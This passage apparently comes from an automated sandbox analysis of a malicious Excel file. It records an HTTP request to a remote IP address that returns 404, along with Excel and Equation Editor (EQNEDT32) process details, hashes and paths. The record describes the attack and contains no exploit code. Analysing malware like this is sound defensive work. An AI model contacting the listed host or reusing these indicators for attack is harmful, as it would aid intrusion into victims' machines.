    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: 103.133.109.192
    Connection: Keep-Alive
    Jun 16, 2021 12:17:42.607487917 CEST1INHTTP/1.1 404 Not Found
    Date: Wed, 16 Jun 2021 10:17:42 GMT
    Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
    Content-Length: 302
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=iso-8859-1
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 37 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 6b 20 50 48 50 2f 37 2e 33 2e 32 38 20 53 65 72 76 65 72 20 61 74 20 31 30 33 2e 31 33 33 2e 31 30 39 2e 31 39 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28 Server at 103.133.109.192 Port 80</address></body></html>


    Code Manipulations

    Statistics

    CPU Usage

    Click to jump to process

    Memory Usage

    Click to jump to process

    High Level Behavior Distribution

    Click to dive into process behavior distribution

    Behavior

    Click to jump to process

    System Behavior

    Analysis Process: EXCEL.EXE PID: 2524 Parent PID: 584

    General

    Start time:12:16:43
    Start date:16/06/2021
    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    Wow64 process (32bit):false
    Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Imagebase:0x13fdc0000
    File size:27641504 bytes
    MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    Chronological Activities

    Analysis Process: EQNEDT32.EXE PID: 2772 Parent PID: 584

    General

    Start time:12:17:04
    Start date:16/06/2021
    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    Wow64 process (32bit):true
    Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
    Imagebase:0x400000
    File size:543304 bytes
    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    Chronological Activities

    Disassembly

    Reset < >